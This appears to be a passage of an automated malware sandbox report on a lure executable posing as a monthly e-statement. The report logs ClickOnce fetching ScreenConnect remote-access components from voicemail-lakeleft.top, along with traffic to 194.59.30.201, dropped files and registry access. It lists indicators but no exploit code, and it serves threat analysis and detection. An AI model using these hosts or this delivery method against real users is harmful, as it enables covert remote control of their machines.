                  Source: svchost.exe, 0000000E.00000003.1698491632.000002094ED40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3155528629.000002094E43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1698453776.000002094ED3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1698511816.000002094ED63000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/DeviceUpdate.srf
                  Source: svchost.exe, 0000000E.00000003.1698491632.000002094ED40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3155528629.000002094E43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1698453776.000002094ED3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1698511816.000002094ED63000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/EnumerateDevices.srf
                  Source: svchost.exe, 0000000E.00000003.1698491632.000002094ED40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1698453776.000002094ED3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1698511816.000002094ED63000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/ResolveUser.srf
                  Source: svchost.exe, 0000000E.00000002.3155528629.000002094E43F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/ResolveUser.srfsuer
                  Source: svchost.exe, 0000000E.00000003.1698276835.000002094ED10000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3155342046.000002094E437000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/deviceaddmsacredential.srf
                  Source: svchost.exe, 0000000E.00000002.3155528629.000002094E43F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/devicechangecredential.srf
                  Source: svchost.exe, 0000000E.00000003.1698574319.000002094ED27000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/devicechangecredential.srfMM
                  Source: svchost.exe, 0000000E.00000003.1698276835.000002094ED10000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/deviceremovecredential.srf
                  Source: svchost.exe, 0000000E.00000003.1698276835.000002094ED10000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/deviceremovecredential.srfRE
                  Source: svchost.exe, 0000000E.00000002.3155342046.000002094E437000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/deviceremovecredential.srfY
                  Source: qmgr.db.4.drString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe1C:
                  Source: svchost.exe, 0000000E.00000003.1698453776.000002094ED3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1698219169.000002094ED2C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1698315694.000002094ED55000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://signup.live.com/signup.aspx
                  Source: dfsvc.exe, 00000001.00000002.3157733053.000001E8B41CB000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3157733053.000001E8B4325000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3157733053.000001E8B43E4000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3157733053.000001E8B3C9A000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3157733053.000001E8B435D000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3157733053.000001E8B4461000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://voicemail-lakeleft.top
                  Source: dfsvc.exe, 00000001.00000002.3157733053.000001E8B42D7000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3157733053.000001E8B4461000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://voicemail-lakeleft.top/Bin/ScreenConnect.C
                  Source: dfsvc.exe, 00000001.00000002.3176169925.000001E8CDE00000.00000004.00000020.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3177545267.000001E8CDF85000.00000004.00000020.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000007.00000002.1569444555.000000000315F000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000007.00000002.1569444555.0000000003151000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000007.00000002.1568713722.000000000129F000.00000004.00000020.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000007.00000002.1568713722.0000000001331000.00000004.00000020.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000007.00000002.1570200570.000000001BAC8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://voicemail-lakeleft.top/Bin/ScreenConnect.Client.application
                  Source: dfsvc.exe, 00000001.00000002.3157733053.000001E8B3FFF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://voicemail-lakeleft.top/Bin/ScreenConnect.Client.application#Scree
                  Source: dfsvc.exe, 00000001.00000002.3157733053.000001E8B3FFF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://voicemail-lakeleft.top/Bin/ScreenConnect.Client.application#Scree0
                  Source: ScreenConnect.WindowsClient.exe, 00000007.00000002.1569247081.0000000001764000.00000004.00000020.00020000.00000000.sdmp, S0AMH0XA.log.1.drString found in binary or memory: https://voicemail-lakeleft.top/Bin/ScreenConnect.Client.application#ScreenConnect.WindowsClient.appl
                  Source: dfsvc.exe, 00000001.00000002.3176665958.000001E8CDEBF000.00000004.00000020.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000007.00000002.1570147020.000000001BA61000.00000004.00000020.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000007.00000002.1570020021.000000001BA33000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://voicemail-lakeleft.top/Bin/ScreenConnect.Client.application%
                  Source: dfsvc.exe, 00000001.00000002.3177545267.000001E8CDF85000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://voicemail-lakeleft.top/Bin/ScreenConnect.Client.application.6ZZfsA
                  Source: ScreenConnect.WindowsClient.exe, 00000007.00000002.1570346922.000000001BAF9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://voicemail-lakeleft.top/Bin/ScreenConnect.Client.application?e=Support&
                  Source: S0AMH0XA.log.1.drString found in binary or memory: https://voicemail-lakeleft.top/Bin/ScreenConnect.Client.application?e=Support&y=Guest&h=popwee2.zapt
                  Source: ScreenConnect.WindowsClient.exe, 00000007.00000002.1569444555.000000000315F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://voicemail-lakeleft.top/Bin/ScreenConnect.Client.applicationX
                  Source: dfsvc.exe, 00000001.00000002.3176665958.000001E8CDE88000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://voicemail-lakeleft.top/Bin/ScreenConnect.Client.applicationt
                  Source: dfsvc.exe, 00000001.00000002.3157733053.000001E8B3FFF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://voicemail-lakeleft.top/Bin/ScreenConnect.Client.applicationx
                  Source: dfsvc.exe, 00000001.00000002.3157733053.000001E8B42D7000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3178098823.000001E8CDFCD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://voicemail-lakeleft.top/Bin/ScreenConnect.Client.dll
                  Source: dfsvc.exe, 00000001.00000002.3157733053.000001E8B42D7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://voicemail-lakeleft.top/Bin/ScreenConnect.Client.dllPx
                  Source: ScreenConnect.WindowsClient.exe, 00000007.00000002.1569444555.000000000315F000.00000004.00000800.00020000.00000000.sdmp, S0AMH0XA.log.1.drString found in binary or memory: https://voicemail-lakeleft.top/Bin/ScreenConnect.Client.manifest
                  Source: dfsvc.exe, 00000001.00000002.3178098823.000001E8CDFCD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://voicemail-lakeleft.top/Bin/ScreenConnect.Client.manifest-
                  Source: dfsvc.exe, 00000001.00000002.3157733053.000001E8B41CB000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3157733053.000001E8B4325000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://voicemail-lakeleft.top/Bin/ScreenConnect.ClientSer
                  Source: dfsvc.exe, 00000001.00000002.3157733053.000001E8B435D000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3178098823.000001E8CDFCD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://voicemail-lakeleft.top/Bin/ScreenConnect.ClientService.dll
                  Source: dfsvc.exe, 00000001.00000002.3178098823.000001E8CDFCD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://voicemail-lakeleft.top/Bin/ScreenConnect.ClientService.dllu#
                  Source: dfsvc.exe, 00000001.00000002.3157733053.000001E8B4263000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3174576774.000001E8CC419000.00000004.00000020.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3173633903.000001E8CC340000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://voicemail-lakeleft.top/Bin/ScreenConnect.ClientService.exe
                  Source: dfsvc.exe, 00000001.00000002.3157733053.000001E8B4461000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://voicemail-lakeleft.top/Bin/ScreenConnect.Core.dll
                  Source: dfsvc.exe, 00000001.00000002.3157733053.000001E8B435D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://voicemail-lakeleft.top/Bin/ScreenConnect.Windo
                  Source: dfsvc.exe, 00000001.00000002.3178098823.000001E8CDFCD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://voicemail-lakeleft.top/Bin/ScreenConnect.Windows.dll
                  Source: dfsvc.exe, 00000001.00000002.3157733053.000001E8B4263000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://voicemail-lakeleft.top/Bin/ScreenConnect.WindowsBackstageSX
                  Source: dfsvc.exe, 00000001.00000002.3177545267.000001E8CDF85000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://voicemail-lakeleft.top/Bin/ScreenConnect.WindowsBackstageShell.exe
                  Source: dfsvc.exe, 00000001.00000002.3157733053.000001E8B42D7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://voicemail-lakeleft.top/Bin/ScreenConnect.WindowsBackstageShell.exe.config
                  Source: dfsvc.exe, 00000001.00000002.3174576774.000001E8CC419000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://voicemail-lakeleft.top/Bin/ScreenConnect.WindowsBackstageShell.exe.config.
                  Source: dfsvc.exe, 00000001.00000002.3174576774.000001E8CC419000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://voicemail-lakeleft.top/Bin/ScreenConnect.WindowsBackstageShell.exe.config_
                  Source: dfsvc.exe, 00000001.00000002.3157733053.000001E8B43E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://voicemail-lakeleft.top/Bin/ScreenConnect.WindowsCl
                  Source: dfsvc.exe, 00000001.00000002.3157733053.000001E8B4461000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://voicemail-lakeleft.top/Bin/ScreenConnect.WindowsClient.exe
                  Source: dfsvc.exe, 00000001.00000002.3178098823.000001E8CDFCD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://voicemail-lakeleft.top/Bin/ScreenConnect.WindowsClient.exe&
                  Source: dfsvc.exe, 00000001.00000002.3157733053.000001E8B42D7000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3177545267.000001E8CDF85000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://voicemail-lakeleft.top/Bin/ScreenConnect.WindowsClient.exe.config
                  Source: dfsvc.exe, 00000001.00000002.3157733053.000001E8B4263000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://voicemail-lakeleft.top/Bin/ScreenConnect.WindowsClient.exeX
                  Source: dfsvc.exe, 00000001.00000002.3157733053.000001E8B42D7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://voicemail-lakeleft.top/Bin/ScreenConnect.WindowsFileMa
                  Source: dfsvc.exe, 00000001.00000002.3157733053.000001E8B42D7000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3177545267.000001E8CDF85000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://voicemail-lakeleft.top/Bin/ScreenConnect.WindowsFileManager.exe
                  Source: dfsvc.exe, 00000001.00000002.3157733053.000001E8B4263000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3174576774.000001E8CC419000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://voicemail-lakeleft.top/Bin/ScreenConnect.WindowsFileManager.exe.config
                  Source: dfsvc.exe, 00000001.00000002.3174576774.000001E8CC419000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://voicemail-lakeleft.top/Bin/ScreenConnect.WindowsFileManager.exe.config6
                  Source: dfsvc.exe, 00000001.00000002.3157733053.000001E8B4263000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://voicemail-lakeleft.top/Bin/ScreenConnect.WindowsFileManager.exx
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49814
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49798
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49814 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49825 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49825
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
                  Source: unknownHTTPS traffic detected: 194.59.30.201:443 -> 192.168.2.7:49706 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 194.59.30.201:443 -> 192.168.2.7:49748 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 194.59.30.201:443 -> 192.168.2.7:49754 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 194.59.30.201:443 -> 192.168.2.7:49760 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 194.59.30.201:443 -> 192.168.2.7:49771 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 194.59.30.201:443 -> 192.168.2.7:49779 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 194.59.30.201:443 -> 192.168.2.7:49798 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 194.59.30.201:443 -> 192.168.2.7:49814 version: TLS 1.2
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C56C4404C4DEF0DC88E5FCD9F09CB2F1Jump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F2E248BEDDBB2D85122423C41028BFD4Jump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C8E534EE129F27D55460CE17FD628216_1130D9B25898B0DB0D4F04DC5B93F141Jump to dropped file

                  Spam, unwanted Advertisements and Ransom Demands

                  barindex
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SecurityJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SecurityJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SecurityJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SecurityJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security\ScreenConnectJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SecurityJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security\ScreenConnectJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SystemJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SystemJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SystemJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SystemJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SystemJump to behavior

                  System Summary

                  barindex
                  Source: monthly-eStatementForum120478962.Client.exePE Siganture Subject Chain: CN="Connectwise, LLC", O="Connectwise, LLC", L=Tampa, S=Florida, C=US
                  Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmpJump to behavior
                  Source: C:\Users\user\Desktop\monthly-eStatementForum120478962.Client.exeCode function: 0_2_00F2A4950_2_00F2A495
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FFAAC4AAD531_2_00007FFAAC4AAD53
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FFAAC47AEF51_2_00007FFAAC47AEF5
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FFAAC488A101_2_00007FFAAC488A10
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FFAAC4AEB481_2_00007FFAAC4AEB48
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FFAAC4A3C0C1_2_00007FFAAC4A3C0C
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FFAAC491BC81_2_00007FFAAC491BC8
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FFAAC4ACBBD1_2_00007FFAAC4ACBBD
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FFAAC4BA4C01_2_00007FFAAC4BA4C0
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FFAAC48D5991_2_00007FFAAC48D599
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FFAAC4A25811_2_00007FFAAC4A2581
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FFAAC4827481_2_00007FFAAC482748
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FFAAC4951F81_2_00007FFAAC4951F8
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FFAAC4A32FD1_2_00007FFAAC4A32FD
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FFAAC4833A11_2_00007FFAAC4833A1
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FFAAC4939081_2_00007FFAAC493908
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FFAAC493B681_2_00007FFAAC493B68
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FFAAC4761781_2_00007FFAAC476178
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FFAAC4712111_2_00007FFAAC471211
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FFAAC47F4411_2_00007FFAAC47F441
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FFAAC4AB46D1_2_00007FFAAC4AB46D
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeCode function: 10_2_00007FFAAC49D13010_2_00007FFAAC49D130
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeCode function: 10_2_00007FFAAC4670BA10_2_00007FFAAC4670BA
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeCode function: 10_2_00007FFAAC4610CF10_2_00007FFAAC4610CF
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeCode function: 10_2_00007FFAAC4610D710_2_00007FFAAC4610D7
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeCode function: 10_2_00007FFAAC7758F110_2_00007FFAAC7758F1
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeCode function: 10_2_00007FFAAC77013510_2_00007FFAAC770135
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeCode function: 10_2_00007FFAAC776B4910_2_00007FFAAC776B49
                  Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 7160 -ip 7160
                  Source: monthly-eStatementForum120478962.Client.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: ScreenConnect.WindowsBackstageShell.exe.1.dr, PopoutPanelTaskbarButton.csTask registration methods: 'CreateDefaultDropDown'
                  Source: ScreenConnect.WindowsBackstageShell.exe.1.dr, ProgramTaskbarButton.csTask registration methods: 'CreateDefaultDropDown'
                  Source: ScreenConnect.WindowsBackstageShell.exe.1.dr, TaskbarButton.csTask registration methods: 'CreateDefaultDropDown'
                  Source: ScreenConnect.Windows.dll.1.dr, WindowsExtensions.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                  Source: ScreenConnect.Windows.dll.1.dr, WindowsExtensions.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: ScreenConnect.Windows.dll.1.dr, WindowsExtensions.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                  Source: ScreenConnect.ClientService.dll.1.dr, WindowsLocalUserExtensions.csSecurity API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
                  Source: classification engineClassification label: mal51.evad.winEXE@19/76@3/2
                  Source: C:\Users\user\Desktop\monthly-eStatementForum120478962.Client.exeCode function: 0_2_00F21000 LocalAlloc,LocalAlloc,GetModuleFileNameW,CertOpenSystemStoreA,LocalAlloc,LocalAlloc,CryptQueryObject,LocalFree,CryptMsgGetParam,CryptMsgGetParam,LocalAlloc,LocalAlloc,CryptMsgGetParam,CertCreateCertificateContext,CertAddCertificateContextToStore,CertFreeCertificateContext,LocalFree,CryptMsgGetParam,LocalFree,LocalFree,CryptMsgGetParam,CryptMsgGetParam,CertFindAttribute,CertFindAttribute,CertFindAttribute,LoadLibraryA,GetProcAddress,Sleep,CertDeleteCertificateFromStore,CertDeleteCertificateFromStore,CertCloseStore,LocalFree,LocalFree,LocalFree,0_2_00F21000
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\DeploymentJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeMutant created: NULL
                  Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7160
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exeMutant created: \BaseNamedObjects\Global\netfxeventlog.1.0
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Temp\DeploymentJump to behavior
